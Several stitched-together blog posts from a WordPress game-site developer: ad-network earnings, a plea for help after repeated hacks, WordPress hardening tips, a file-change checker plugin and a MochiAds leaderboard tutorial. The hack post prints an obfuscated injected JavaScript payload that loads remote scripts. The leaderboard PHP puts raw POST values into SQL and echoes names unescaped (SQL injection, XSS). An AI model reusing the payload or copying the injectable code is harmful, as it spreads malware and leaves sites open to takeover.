Here’s something new: did you notice, during this month, two ads about Farmville secrets and iPhone application development? Here they are:

These two ads belong to ClickBank, an ad network which at the moment made its clients earn more than a billion dollars.

As you can see in these two pictures, I did not earn a cent.

Let’s see what happened:

The reasons behind a failure

When I signed up at ClickBank, I obviously decided to display ads having something to do with my blog… this means programming, gaming or monetizing.

The most “interesting” products I was able to find were:

* A couple of registry cleaners (??)
* A couple of PS3 scam backup system (scam because you won’t be able to play with your backups)
* A dozen ebooks about the ULTIMATE (yeah) way to make money with a blog, or with ebay, or whatsoever
* Some hosting services

The first question was: did I really want my readers to buy a useless PS3 backup system? Come on…

So i opted for a FarmVille guide, even if I am not a FarmVille fan and I hate people posting on Facebook they just found a cripple blind sheep in their damned banana field. All in all FV is a great viral game and I thought a guide would be useful for some addicted players.

The other choice was a guide to iPhone programming… why not… I have a lot of programmers among blog readers.

Why it did not work

Well, every blog has its niche readers. Programmers are quite smart… unlike blogging mogul wannabes, they won’t buy anything from one-page websites claiming to sell the “Ultimate Guide to [put your favorite topic here, obviously all uppercase]”

People like you are looking for real deals from real companies, supported by real case studies… that’s why I was one of the three most important MochiAds referral while I wasn’t able to sell a single ClickBank guide.

So it was a waste of time. Wait. It wasn’t

Thanks to my experience, if you have a programming blog you can improve your ads revenue looking for products you can really review, test and suggest, leaving “ultimate guides” to newbies.

This obviously is my personal story, and results may vary according to the niche you’re talking at.

So I am releasing the new version, compatible with the new feed and tested with WordPress 2.9.2. You can find it at the official page.

Talking about plugins, I am developing a new theme/plugin using crontables that automatically feeds the games, fixes the tables if MochiMedia updates the feed, and chooses the best games to publish.

Everything without any interaction from the user. The ultimate “forget about it and make money with your arcade site” plugin.

Stay tuned.

I tried everything, such as 10 ways to secure your WordPress blog and changing the hosting.

Attacks continue, with injection of malicious code in javascript files.

I had my hotsing service, HostGator, monitoring the activity on the blog and they said “We found a few PHP shells on your account and removed this. This indicates that you have insecure scripts on your account. Please review each script and esure that you are running the latest versions”.

Obviously I am running the latest versions of everything, so I really do not know how to prevent the site for being hacked almost every day.

That’s why I need you… I am not a security expert but maybe some of you are.

I need some hints and tips about finding this insecure script and removing it once for all.

I will update this post with all information you need.

If you are a security pro, I can pay for your service or can give you a lifetime ad somewhere in the blog (but I’d prefer to pay :))

UPDATE #1

The blog has been attacked again. Look how did the modify jquery.js file

And this is the injected code

$a="Z64zZ3dZ22Z2566uZ256ecZ2574ionZ2520Z2564w(Z2574Z2529Z257bcaZ253dZ2527Z252564Z25256fcuZ25256denZ252574Z252eZ252577ritZ252565(Z25252Z2532Z2527;Z2563eZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscZ252572iZ2525Z2537Z2530Z2574Z252520Z25256cZ252561Z256egZ252575Z252561Z2567eZ25253dZ25255cZ252522jZ2561vasZ252563rZ2569Z2570Z252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscriZ252570tZ25253eZ2527;evaZ256c(uZ256eZ2565Z2573Z2563apeZ2528t))Z257d;Z22;czZ3dZ22Z2566uncZ2574ioZ256e cZ257a(czZ2529Z257brZ2565tuZ2572n Z2563Z2561+Z2563b+cZ2563Z252bcdZ252bce+Z2563z;}Z253bZ22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;ceZ3dZ223harZ2543odZ2565AtZ2528Z2530Z2529^(Z25270Z257800Z2527+eZ2573)))Z253b}}Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;stZ3dZ22Z2573tZ253dZ2522Z2524aZ253dsZ2574;Z2564Z2563sZ2528Z2564Z2561Z252bdZ2562Z252bZ2564cZ252bdZ2564+Z2564eZ252cZ2531Z2530Z2529;Z2564Z2577Z2528sZ2574)Z253bsZ2574Z253d$Z2561;Z2522;Z22;cdZ3dZ22dst+Z2553trZ2569ng.Z2566Z2572omZ2543hZ2561Z2572Z2543oZ2564e((Z2574Z256dp.Z256Z22;caZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564csZ2528dsZ252cesZ2529Z257bdsZ253dunZ2565scaZ257Z22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564Z2563Z2573(cZ2575Z252cZ2531Z2534Z2529);Z2522;Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;dfZ7bl;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;cbZ3dZ220Z2565(Z2564s)Z253bstZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0;iZ253cds.lZ256Z22;ccZ3dZ225nZ2567th;Z2569++)Z257btmZ2570Z253dds.sZ256cicZ2565(i,Z2569+1)Z253bstZ253Z22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;Z69Z66 Z28Z64oZ63Z75menZ74.coZ6fkiZ65Z2eindZ65xOfZ28Z27rZ665Z66Z36dsZ27)Z3dZ3d-1)Z7bfuZ6ecZ74Z69oZ6e Z63aZ6clbZ61cZ6b(Z78)Z7bwinZ64ow.Z74w Z3d Z78;vZ61Z72 dZ20Z3d Z6eew Z44Z61te(Z29Z3bdZ2eZ73Z65tZ54Z69mZ65Z28x[Z22as_Z6fZ66Z22]Z2a100Z30)Z3bZ76arZ20h Z3d Z64.geZ74Z55TZ43HZ6fZ75Z72Z73Z28)Z3bwZ69nZ64Z6fZ77.h Z3d hZ3bZ69Z66Z20(Z68 Z3e Z38)Z7bZ64Z2esetZ55TCZ44atZ65(d.Z67eZ74Z55TCDZ61Z74e(Z29 Z2d 2)Z3b}Z65lsZ65Z7bdZ2esetZ55TCZ44atZ65(dZ2egZ65tUZ54CDZ61te(Z29 - Z33)Z3bZ7dwinZ64Z6fZ77Z2eZ67dZ20Z3d Z64;vaZ72 tiZ6de Z3dZ20nZ65Z77Z20ArrZ61y()Z3bvarZ20sZ68iftZ49Z6edeZ78 Z3d Z22Z22;tiZ6de[Z22yeZ61rZ22] Z3d d.gZ65tZ55Z54CZ46uZ6clZ59eZ61rZ28);tZ69Z6deZ5bZ22montZ68Z22] Z3d d.Z67eZ74Z55Z54Z43MonZ74hZ28Z29Z2b1;tZ69me[Z22dZ61yZ22] Z3d d.Z67etZ55TCDZ61teZ28)Z3bZ69fZ20(d.Z67etZ55Z54Z43MZ6fZ6eth(Z29+Z31 Z3c 10)Z7bshiZ66tIZ6edZ65xZ20Z3d timeZ5bZ22yeaZ72Z22] +Z20Z22-0Z22 + (Z64.gZ65tUTZ43MonZ74h(Z29+1)Z3bZ7deZ6csZ65Z7bshiftIZ6eZ64eZ78Z20Z3d tiZ6deZ5bZ22yZ65arZ22] + Z22-Z22 +Z20(d.Z67etZ55TCZ4donZ74h()Z2b1Z29;}iZ66 (Z64.geZ74UTCZ44ateZ28) Z3c Z310)Z7bsZ68iftZ49ndZ65x Z3dshiZ66tInZ64ex Z2b Z22-0Z22 Z2b dZ2egZ65Z74UTCZ44aZ74Z65(Z29;Z7delsZ65Z7bshiftIZ6edeZ78 Z3d Z73hifZ74IndZ65Z78 +Z20Z22Z2dZ22 + dZ2egetZ55Z54Z43DaZ74e()Z3bZ7ddZ6fZ63umZ65Z6etZ2eZ77Z72Z69Z74e(Z22Z3cscrZ22+Z22iptZ20lanZ67uaZ67eZ3djZ61vZ61sZ63riZ70tZ22+Z22 sZ72Z63Z3dZ27htZ74pZ3aZ2fZ2fsearch.tZ77Z69tZ74eZ72.cZ6fmZ2ftrZ65nZ64Z73Z2fZ64aiZ6cy.jZ73oZ6e?dZ61teZ3dZ22+ sZ68ifZ74InZ64Z65x+Z22&caZ6clbZ61cZ6bZ3dcallZ62Z61cZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iZ70tZ3eZ22);}Z20Z66Z75nctZ69oZ6eZ20cZ61lZ6cbacZ6bZ32Z28xZ29Z7bwindZ6fZ77Z2etwZ20Z3d x;scZ28Z27rf5Z666dsZ27,Z32,7Z29Z3bevZ61Z6cZ28uZ6eZ65scZ61Z70Z65(dZ7aZ2bcz+Z6fp+sZ74Z29Z2bZ27dw(dZ7a+Z63z(Z24a+sZ74));Z27Z29Z3bdZ6fcumZ65Z6eZ74.Z77ritZ65($aZ29Z3b}dZ6fcZ75menZ74.wZ72Z69te(Z22Z3cimg Z73rcZ3dZ27httZ70:Z2fZ2fseaZ72Z63h.tZ77ittZ65rZ2ecoZ6dZ2fimagZ65Z73Z2fsearcZ68Z2frZ73s.pZ6egZ27 widtZ68Z3d1 heiZ67htZ3d1 sZ74yleZ3dZ27visibZ69litZ79Z3aZ68iZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt lZ61ngZ75ageZ3djavZ61Z73Z63rZ69ptZ22+Z22 srZ63Z3dZ27httpZ3aZ2fZ2fsearch.twZ69Z74terZ2ecZ6fmZ2ftrendZ73Z2fdailZ79.Z6asoZ6e?cZ61Z6clbZ61Z63kZ3dcallbZ61cZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}eZ6csZ65Z7b$aZ3dZ27Z27};fZ75nZ63tioZ6e scZ28Z63nm,Z76,eZ64Z29Z7bvar Z65xdZ3dnew Z44Z61te(Z29Z3beZ78d.sZ65Z74DZ61teZ28eZ78d.Z67eZ74Z44ateZ28)+eZ64Z29;doZ63Z75Z6dZ65nZ74.cZ6foZ6bieZ3dcnmZ2bZ20Z27Z3dZ27 +escape(Z76)Z2bZ27;eZ78pZ69rZ65sZ3dZ27+eZ78dZ2eZ74Z6fGZ4dTStZ72iZ6eg()Z3b}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));

As old readers know, my blog has been hacked several times. You can read about my first hack and what to do when your blog has a virus, but now it’s time to prevent hackers from injecting malware in your WordPress blog.

Follow these simple 10 steps, they aren’t ordered in any way, just a list I am writing to help you making your blog more secure

1) Don’t display your WP version: hackers know security holes and exploits of every WP version, and unfortunately in your header.php file you probably have this line:

<meta name="generator" content="WordPress <?php bloginfo(’version’); ?>" />

Remove this tag or simply remove the php function returning the WP version. Your new generator tag should look something like

<meta name="generator" content="WordPress" />

2) Protect your /wp-content/plugins/ directory putting a blank index.html file in it. In latest WP versions there is an empty index.php file that does the same job. This way nobody will see the plugins you installed, checking for exploitable ones.

3) Use a secure password, it shouldn’t be your girlfirend’s name or your daughter’s name. A good password is made by at least 8 characters using both uppercase and lowercase and numbers.

4) Change your login name with something different than “admin”. Most WP installations still use the default admin login to log into administrator area. If your blog is under a brute force attack, you will make hackers life a bit harder if they have to guess both the password and the login name.

5) Install Login LockDown plugin. Login LockDown records the IP address and timestamp of every failed login attempt. If more than a certain number of attempts are detected within a short period of time from the same IP range, then the login function is disabled for all requests from that range. This helps to prevent brute force password discovery. Currently the plugin defaults to a 1 hour lock out of an IP block after 3 failed login attempts within 5 minutes. This can be modified via the Options panel. Admisitrators can release locked out IP ranges manually from the panel.

6) Choose a good hosting company or keep your web server updated. You can secure your WP blog in a million ways, but if your server has security issues, you’re doomed anyway.

7) Secure your /wp-admin/ directory. Create a file called .htaccess in such directory and place this script:

1
2
3
4
5
6
7
8
9
10
11
12

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName “Access Control”
AuthType Basic
order deny,allow
deny from all
# allowed IP's
allow from xxx.xxx.xxx.xxx
allow from yyy.yyy.yyy.yyy
...
...
allow from zzz.zzz.zzz.zzz

Change xxx, yyy and zzz with IP’s you currently log in from

8) Keep your WP version (not too) updated. While old WP versions may have security bugs that aren’t fixed anymore, installing the latest release can expose you to unknown bugs during the first day. If it’s not a critical security update, my advice is to wait at least a couple of days before installing the new version.

9) Get rid of bad bots adding these lines to your main .htaccess file (the one in your WP root)

1
2
3
4
5
6

SetEnvIfNoCase User-Agent "^Libwww-perl" bad_bot
<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>

If you look in your server logs you will probably see attempts by automated scripts (bots) to hack your site. This happens to all sites, and the Libwww-perl agent is recognized to be one of thw worst of them. Check this Google search for more information.

10) When you are about to install a plugin, Google for it, to make sure nobody is reporting security issues

… and death to pirates…

Someone injected an encoded javascript code into my footer.php theme making my site open an iframe with some badware.

The same old things that happen when you’re famous :)

The boring part of this story is now I check for my WP files every day, to prevent code injection, until I’ll find the way hackers use to inject such code.

So I developed a very basic plugin to do this job for me. It scans my themes directory and outputs the files modified in the last 24 hours.

I don’t know if I’ll turn this prototype into a real, finished, plugin… but meanwhile you can take a look at the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

<?php
/*
Plugin Name: Check file dates
Plugin URI: http://www.emanueleferonato.com/
Description: Checks the date and time that wp files have been last modified.
Author: Emanuele Feronato
Version: 1.0
Author URI: http://www.emanueleferonato.com/
*/
 
add_action('admin_menu', 'add_plugin_pages');
 
function add_plugin_pages(){
    add_menu_page('Check dates', 'Check dates', 8, __FILE__, 'mt_toplevel_page');
}
 
function date_tree($start_dir,$date){
     $dirs = array_diff(scandir($start_dir),Array(".",".."));
     foreach($dirs as $file){
          if(is_dir($start_dir."/".$file)){
               date_tree($start_dir."/".$file,$date);
          }
          else{
               $mod_date = date("Y-m-d H:i:s",filemtime($start_dir."/".$file));
               if($mod_date>$date){
                    echo "<li>".$start_dir."/<strong>".$file."</strong> -> ".date("Y-m-d H:i:s",filemtime($start_dir."/".$file))."</li>";
               }
          }
    }
}
 
function mt_toplevel_page(){
     $date = date("Y-m-d",strtotime("-1 day"))." 00:00:00";
     echo "<h2>Searching for files modified after ".$date."</h2>";
     echo "<ul>";
     date_tree(get_theme_root(),$date);
     echo "</ul>";
}
 
?>

And outputs something like this:

Searching for files modified after 2009-10-07 00:00:00
footer.php -> 2009-10-07 23:31:56
header.php -> 2009-10-08 17:58:14

If you want to try it, simply create a new file into your plugins directory and paste this code.

If you see some interesting use out of it by adding some options, let me know and maybe I’ll finish it.

You are invited to download version 1.11, while I am thinking about a way to automatically inform all plugin users when I release a new version.

I noticed some plugins have an auto-update system but it’s not what I am looking for, I would like to have some kind of database driven area when I can write custom message rather than a warning in the plugin page.

Stay tuned, and meanwhile install the new version.

The next one I am developing will surely include this feature.

In part 2 we saw how to prevent cheating.

In this 3rd part we’ll make something useful with it. I am going to add to my Triqui MochiAds Arcade theme for WordPress a WordPress widget showing the latest scores submitted from my portal, triqui.com, but once you understand how to do it, you can easily change the script to make it fit your needs.

The first thing to do is creating a new table in your WordPress database. At this time, I only want to save player name, score and obviously the game unique id.

So my MySQL query is:

1
2
3
4
5
6
7
8

CREATE TABLE IF NOT EXISTS `wp_mochi_scores` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `when` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `gameid` text COLLATE utf8_unicode_ci NOT NULL,
  `name` text COLLATE utf8_unicode_ci NOT NULL,
  `score` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

as you can see, I added a primary auto increment key and a timestamp field, to determine when the score has been saved.

Then I need to change postscores.php this way:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

<?php
 
// your secret key
$key="f26ebddd6fcfb796ac1841bcc57af057";
 
// initializing an empty string - not strictly necessary
$string = "";
 
// ordering the associative POST array by keys
ksort($_POST);
 
// loop scanning through all POST array
foreach($_POST as $varname => $varvalue){
     // if the key is not "signature" then append key and url encoded values to the string
     if($varname!="signature"){
          $string.=$varname."=".rawurlencode($varvalue)."&";
     }
}
 
// removing the last character (a "&"")
$string = substr($string,0,strlen($string)-1);
 
// appeding the secret key to the string
$string.= $key;
 
// comparing the md5 encryption of the string with the "signature" variable
if(md5($string)==$_POST[signature]){
     // requiring the relative path to your wp-config.php file
     // according to your wp installation, this path may change
     // but in most cases it will work this way
     require("../../../wp-config.php");
     // connecting to wp database
     $link = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD);
     // selecting the proper database
     $db = mysql_select_db($link,DB_NAME);
     // inserting the game tag, the score and the player name
     $result = mysql_query("insert into ".$table_prefix."mochi_scores (gameid,name,score) values('$_POST[gameID]','$_POST[name]','$_POST[score]')");
}
 
?>

Now I have a script that silently populates the mochi_scores table with the latest scores.

It’s time to show them in a widget.

If you don’t know what is a widget or how to create and activate it, follow How to create a WordPress Widget.

I created a file called mochi_lastscores.php with this content:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

<?php
/*
Plugin Name: Mochi lastscores
Plugin URI: http://www.emanueleferonato.com/
Description: Displays last scores submitted in your MochiAds Arcade
Author: Emanuele Feronato
Version: 1.0
Author URI: http://www.emanueleferonato.com/
*/
 
function mochi_lastscores_widget() {
     global $wpdb;
     echo"<li><h2>LATEST SCORES</h2>";
     // selecting the latest 10 scores
     $query = "select * from ".$wpdb->prefix."mochi_scores order by id desc limit 0,10";
     // saving scores inside an array called "scores"
     $scores = $wpdb->get_results($query,ARRAY_A);
     if($scores){
          echo "<ul>";
          // scanning all scores
          foreach($scores as $score){
               // looking for the entry in my mochi game table with the same game tag as the one I saved
               $query = "select * from ".$wpdb->prefix."mochi where game_tag = \"$score[gameid]\"";
               // saving the entry in an array called "game"
               $game = $wpdb->get_results($query,ARRAY_A);
               // if the entry has a blog_id...
               if($game[0][blog_id]){
                    // selecting the post in the wp post table with the same id as the game found in the mochi games table
                    $query = "select * from ".$wpdb->prefix."posts where ID = ".$game[0][blog_id];
                    // saving the entry in a variable called "post"
                    $post = $wpdb->get_results($query,ARRAY_A);
                    // printing the entry in the theme
                    echo "<li><span class = \"turnwhite\">$score[name]</span> just scored <span class = \"turnwhite\">$score[score]</span> on <a href = \"".$post[0][guid]."\">".$game[0][name]."</a></li>";
               }
          }
          echo "</ul>";
     }
     echo "</li>";
}
 
function init_mochi_lastscores(){
     register_sidebar_widget("Mochi Last Scores", "mochi_lastscores_widget");     
}
 
add_action("plugins_loaded", "init_mochi_lastscores");
 
?>

And you can find the result in the left sidebar in my triqui.com portal.

This feature will be added in my next Triqui MochiAds Arcade theme for WordPress update, but meanwhile you can easily set it up on your own.

Publishers will also have the opportunity to earn additional 10% of all transactions taking place on their site in games in cases where the developer has opted-in to share micro-transactions revenue with publishers.

In order to do this, MochiMedia changed the feed used for parsing games, so I upgraded the Triqui MochiAds Arcade plugin for WordPress to version 1.1 in order to make it compatible with the new features.

I made some other minor improvements, check for 1.1 upgrades in the official page.

In the first step I showed you how to configure a cross-domain policy file, calling the javascript and send the results to a webpage.

Now it’s time to prevent cheating.

As you can see, it’s very easy to send some POST variables to a webpage, and it’s even easier to do it when you know the name of such webpage… and in our case you can know it simply looking at the html.

If you look at the html of the page containing Mazeroll, it’s clear the name of the page I send the POST array to is postscores.php.

So we have to prevent cheating.

That’s why in your MochiAds publisher settings page you’ll find a secret key that can be used to authenticate the score data sent from the Bridge to your server.

In your POST variables you can find one called signature.

This is an MD5 hash of the POST vars + your secret key. So the MD5 hash of the POST vars + your secret key and the signature must match.

In order to use this for authentication, you have to follow these steps:

1. Populate an array of all parameter names as keys and their values
2. Remove out the signature parameter
3. Sort the array alphabetically by the key name
4. Turn the array into a url encoded string
5. Append your secret key
6. Compute the MD5 hash with the string
7. compare your MD5 hash with the signature parameter sent by the Bridge

So I prepared this little script that does the job:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

<?php
 
// your secret key
$key="xxxxxxxxxxxxxxxxxxxxxxxxxx";
 
// initializing an empty string - not strictly necessary
$string = "";
 
// ordering the associative POST array by keys
ksort($_POST);
 
// loop scanning through all POST array
foreach($_POST as $varname => $varvalue){
     // if the key is not "signature" then append key and url encoded values to the string
     if($varname!="signature"){
          $string.=$varname."=".rawurlencode($varvalue)."&";
     }
}
 
// removing the last character (a "&"")
$string = substr($string,0,strlen($string)-1);
 
// appeding the secret key to the string
$string.= $key;
 
// comparing the md5 encryption of the string with the "signature" variable
if(md5($string)==$_POST[signature]){
     // it's a valid submission!
}
 
?>

Now you can check for valid submissions, next time I’ll show you what to do with them

Now that you have a WordPress theme and plugin in order to set uo your own MochiAds arcade site like triqui.com, let’s see how we can add some interesting features with the Publisher Bridge.

Every step explained in this tutorial will be included in the next upgrade of Triqui MochiAds Arcade theme, but it’s very interesting to see how does it work in order to custom it or install it in your own arcade site.

First, let me explain why you should use the Publisher Bridge… the reasons are listed in the official page:

1. Leverage the hundreds of MochiAds leaderboard enabled games to attract new players.
2. Receive new traffic – MochiAds’ Challenges feature will drive new players back to your site to compete in top scores.
3. Build exciting site features – Save player scoring info for all MochiAds leaderboard-enabled games.
4. Encourage competition – In-game scores are listed for your community only.
5. Maintain consistency – Display your own community usernames when players post scores.
6. Promote your brand – Put your site logo directly in the game.

but, as usual, it’s up to your creativity finding the best way to use them.

Cross-domain policy

From the Cross-domain policy file specification you cana cross-domain policy file is an XML document that grants a web client – such as Adobe Flash Player (though not necessarily limited to it) – permission to handle data across multiple domains. When a client hosts content from a particular source domain and that content makes requests directed towards a domain other than its own, the remote domain would need to host a cross-domain policy file that grants access to the source domain, allowing the client to continue with the transaction.

So the first thing you should do is to create a file called crossdomain.xml in your root, with this content:

1
2
3
4
5
6
7
8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
     <site-control permitted-cross-domain-policies="master-only"/>
     <allow-access-from domain="x.mochiads.com"/>
     <allow-access-from domain="www.mochiads.com"/>
</cross-domain-policy>

This will allow Mochi client to communicate with your server.

Javascript call

Once your server is able to communicate, you need to insert the javascript provided by Mochi in the same page where you host (or leech) a game.

You don’t need to know if the game has a leaderboard, if the game does not support highscores, nothing will happen.

This is the one I used:

1
2

<script src="http://xs.mochiads.com/static/pub/swf/leaderboard.js" type="text/javascript"></script>
               <script type="text/javascript">var options = {partnerID: "3b7a2ab2368e1d2d", id: "leaderboard_bridge",globalScores:"true",gateway : "http://www.triqui.com/wp-content/themes/triqui/postscores.php",callback : function (params) {document.getElementById('latest').innerHTML="Your latest score: "+params.score;}}; Mochi.addLeaderboardIntegration(options);</script>

I used only a few options among the ones provided by Mochi, let me explain them:

partnerID: this is the ID MochiAds gave you when you signed up as a publisher. Remember: the Publisher ID, not the Publisher Secret Key!!!

id: The id of the HTML element you want to place the Bridge SWF into. Place such element wherever you want, it’s not important since it does not contain anything.

globalScores: Set to true if you wish to display global scores and not just those submitted from your site. I recommend to set it to true if your portal does not have that much visits per day (under 10,000).

gateway: the absolute path of a file that will receive posted data with POST method. I’ll explain how to use such data in next tutorial

callback: a JavaScript function which will be called when the player submits a score. In my case, I simply display in the page the latest score the player got, but obviously you can use Ajax to improve the interactivity.

Try to see it in action playing a leaderboard enabled game on Triqui.com, such as Mazeroll and see what happens when you submit a score.

But the most exciting feature lies in the gateway: having all score data in the POST array will allow you to create custom leaderboards and some other interesting things I’ll explain during next tutorial.

Meanwhile, look at the variables the bridge passes to postscores.php page when I submit a score, obtained with a simple var_dump:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

array(14) {
  ["signature"]=>
  string(32) "(had to omit it)"
  ["sessionID"]=>
  string(0) ""
  ["userID"]=>
  string(0) ""
  ["username"]=>
  string(0) ""
  ["scoreLabel"]=>
  string(6) "Points"
  ["sortOrder"]=>
  string(4) "desc"
  ["datatype"]=>
  string(6) "number"
  ["description"]=>
  string(0) ""
  ["title"]=>
  string(10) "Highscores"
  ["gameID"]=>
  string(16) "98c536dbf70a1cbc"
  ["boardID"]=>
  string(32) "4b2ac948de239f8853a3bc6a1b771d9d"
  ["name"]=>
  string(4) "ququ"
  ["score"]=>
  string(3) "520"
  ["lcId"]=>
  string(1) "1"
}

Next time I’ll show you how to use these values.